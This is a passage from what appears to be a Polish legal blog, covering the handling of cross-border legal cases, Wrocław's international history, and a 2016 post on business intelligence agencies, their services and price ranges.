Co ciekawe przy okazji szkoleń dla profesjonalnych pełnomocnika z zakresu prawa międzynarodowego odbywających się m. in. we Wrocławiu miałem okazję przekonać się, że wielu prawników zagranicznych z uprawnieniami adwokata przybywa aktualnie w Polsce i tu praktykuje utrzymując jednocześnie ścisłe relacje z kancelariami ze swoich ojczyzn. Niekiedy można zatem nawiązać kontakt z właściwym prawnikiem zagranicznym osobiście, bez konieczności podróży do innego państwa.

W zależności od charakteru sprawy  transgranicznej niekiedy koniecznym jest skorzystanie z pomocy firmy windykacyjnej świadczącej usługi windykacji międzynarodowej, czy z lokalnego, zagranicznego biura księgowego.  Kontakty do tych podmiotów, w razie takiej potrzeby, powinniśmy uzyskać bez problemu od kancelarii adwokackiej, której powierzymy prowadzenie naszej sprawy międzynarodowej.

Co należy potrafić aby podjąć się prowadzenia sprawy międzynarodowej?

Przede wszystkim konieczna jest znajomość języków obcych. Nieodzowna jest znajomość prawniczego języka angielskiego a wskazana znajomość innych popularnych języków europejskich takich, jak francuski czy język niemiecki. Jeżeli zatem decydujemy się na samodzielne prowadzenie sprawy międzynarodowej lub powierzamy ją kancelarii to upewnijmy się, że osoba która będzie się nią zajmować nie będzie miała problemów językowych. Może to bowiem skomplikować najprostszą nawet sprawę.

Wskazane jest również aby  sprawą międzynarodową zajmować się osoba posiadająca doświadczenie w transgranicznej obsłudze prawnej. W przeciwnym razie narażamy się na ryzyko pominięcia istotnych okoliczności, czego konsekwencje mogą być bardzo poważne.

Na blogu znajdują się moje wcześniejsze wpisy opisujące, jak napisać wezwanie do zapłaty w języku angielskim oraz wezwanie do zapłaty w języku niemieckim, do których lektury zachęcam.

WROCLAW, POLAND - APRIL 02, 2016: Aerial view of Wroclaw. Illuminated city skyline during a beautiful sunset, April 02, 2016 in Wroclaw, Poland.

Prawo międzynarodowe Wrocław.

Wrocław jest miastem szczególnym – ze względu na koleje historii i zdarzenia które spowodowały że krzyżują się na jego ulicach, podwórkach, placach losy wielu narodów.

W swojej długiej historii Wrocław był miastem wchodzącym w skład Polski, Czech,  Austrii, Prus, Niemiec .  Co więcej od  1807r. Wrocław  był okupowany kilka lat przez wojska należące do… Francji.

To do Wrocławia po 1945r. przesiedlono inteligencję z Lwowa i Wilna  – ludzi o potężnym dorobku naukowym, którzy stworzyli podwaliny dla rozwoju życia naukowego po okresie II Wojny Światowej.

To we Wrocławiu kształci się aktualnie 140.000 studentów z czego co piętnasty to gość z zagranicy.

Nie ulega wątpliwości, że Wrocław jest europejską stolicą kultury w związku z czym formalnością było przyznanie mu miana Europejskiej Stolicy Kultury 2016.

Historia miasta niewątpliwie ma wpływ na mentalność jego mieszkańców – nie inaczej jest w przypadku Wrocławia, który jest miejscem gościnnym i otwartym na cudzoziemców i ideę współpracy międzynarodowej. Prawo międzynarodowe Wrocław pozostają w ścisłym związku, który stale się wzmacnia.

wywiadownie gospodarcze

Andrzej Żurawski        04 czerwca 2016        Komentarze (0)

Wywiadownie gospodarcze w ostatnim czasie nabywają dużego znaczenia dla podmiotów zainteresowanych bezpieczeństwem w prowadzonej działalności gospodarczej. W świecie, w którym króluje informacja, a sukces w biznesie zależy od szybkości jej zdobycia i przetworzenia, niebagatelną rolę zaczynają odgrywać źródła z jakich może ona być pozyskiwana. Tradycyjne źródła pozyskiwania informacji: od znajomych, kontrahentów, czy z rejestrów państwowych przestały być wystarczające by zdobyć całościową informację umożliwiającą rzetelny ogląd sytuacji będący podstawą do podjęcia precyzyjnych i zakończonych sukcesem posunięć biznesowych.

wywiadownie gospodarcze

Dostrzegając powyższe potrzeby i wychodząc im naprzeciw powstał rynek firm zajmujących się wywiadem gospodarczym. Na wstępie trzeba zaznaczyć, iż wywiad gospodarczy bardzo często mylony jest ze „szpiegostwem gospodarczym”, zupełnie niesłusznie. Mianem szpiegostwa gospodarczego określać się bowiem powinno nielegalne i dokonywane najczęściej przez tajne służby państwowe, natomiast działalność wywiadowni gospodarczych jest działalnością jak najbardziej legalną.  Istnieje kilka płaszczyzn, na którym można rozpatrywać działalność wywiadowczą, są to:

 • wywiad konkurencyjny (koncentrujący się na informacjach o przedsiębiorcach na tym samym rynku),
 • wywiad biznesowy (związany głównie z analizą i porządkowaniem wielu skomplikowanych i powiązanych informacji z całego rynku),
 • wywiad ekonomiczny (skupia się na badaniu przepływów zasobów finansowych i niefinansowych wewnątrz danych krajów lub globalnych organizacji),
 • wywiad nt. rzetelności firm (zajmuje się wszechstronnym badaniem konkretnego podmiotu, zarówno pod względem jego powiązań finansowych i prawnych, a także możliwości finansowych, posiadanych zasobów ludzkich i kapitałowych),
 • wywiad handlowy (obejmuje pozyskanie, przetworzenie i udostępnianie danych o podmiotach gospodarczych, ich funkcjonowaniu w otoczeniu, działalności, informacji o konkurencji i kondycji handlowej, powiązaniach i sytuacji prawnej, a także innych danych, istotnych z punktu widzenia działalności gospodarczej).

Wywiadownie gospodarcze oferują obszerny wachlarz usług: począwszy od sprawdzania wiarygodności firmy oraz pracowników oraz członków zarządu, ustaleń dotyczących posiadanego majątku, poprzez obserwację pracowników i członków zarządu przedsiębiorstwa i jego mienia, działania polegające na kontrwywiadzie i ochronie przed czynami nieuczciwej konkurencji, aż po prowadzenie działań windykacyjnych i własnych śledztw mających za zadanie wykrycie przestępstw gospodarczych.

Detektywi gospodarczy w swojej pracy korzystają z najrozmaitszych instrumentów. Detektywi zajmują się m. in. ustaleniem płynności finansowej, dokonują analizy wiarygodności płatniczej, dostępnych danych na temat majątku, np. praw własności do nieruchomości na podstawie treści ksiąg wieczystych, dokonują ustaleń rzetelności w kontraktach handlowych a nawet opinii, jaka panuje w środowisku na temat kontrolowanego podmiotu. Prowadzą także działalność wywiadowczą wśród pracowników, współpracowników, kontrahentów danego przedsiębiorstwa,pozyskują dane z Krajowego Rejestru Dłużników.

Ceny usług wywiadu gospodarczego są stosunkowo wysokie i wahają się w zależności od państwa w jakim funkcjonuje dany podmiot i od czasu w jakim informacje mają być zdobyte, a raport przygotowany, niektóre firmy zajmujące się wywiadem gospodarczym oprócz przygotowania raportów całościowych oferują zdobycie jedynie konkretnych, interesujących przedsiębiorców informacji takich jak: wyjawianie nieruchomości, ruchomości, majątku, postępowań sądowych i komorniczych, rodzaju posiadanych wierzytelności, zadłużenie publicznoprawne, informacji o zatrudnieniu , weryfikacji adresów , a także powiązań osobowych i kapitałowych. Rozpiętość cen poszczególnych usług obrazuje poniższa tabela:

Usługa
Cena-OD
Cena-DO
Wyjawianie nieruchomości
200
400
Wyjawianie ruchomości
200
400
Wyjawianie całości majątku
900
1300
Sprawy sądowe i komornicze
200
400
Informacja o wierzytelnościach
200
400
Zadłużenie podatkowe
200
400
Informacja o zatrudnieniu
200
400
Dane adresowe
200
400
Powiązania osobowe i kapitałowe
700
1100

Niektóre wywiadownie gospodarcze proponują kompleksowe usługi, polegające na przygotowaniu całościowych raportów handlowych w których brane pod uwagę są wszystkie o których mowa była powyżej, w ofercie brane są pod uwagę dwa czynniki: państwo w jakim działa lub jest zarejestrowany dany podmiot i szybkości w jakich raport będzie przygotowany. Rozpiętości cen obrazuje poniższa tabela:

Kraje (obszar)
Normalny
Pilny
Expres
Europa Środkowa
300-400
600-800
900-1300
Europa Zachodnia
350-400
700-900
1000-1500
Europa Wschodnia
400-600
900-1100
1400-1600
Europa Północna
600-800
1300-1600
2100-2500
Ameryka Północna
700-900
1500-1800
2000-2600
Azja
900-1100
1800-2200
2500-3000

Wywiad gospodarczy może być doskonałym źródłem informacji gospodarczej przy założeniu, że potrafimy określić jakie dane dotyczące działalności sprawdzanego podmiotu są dla nas istotne. W przeciwnym razie koszt pozyskania informacji przez wywiadownie gospodarcze może okazać się niewspółmierny do korzyści z nich płynących.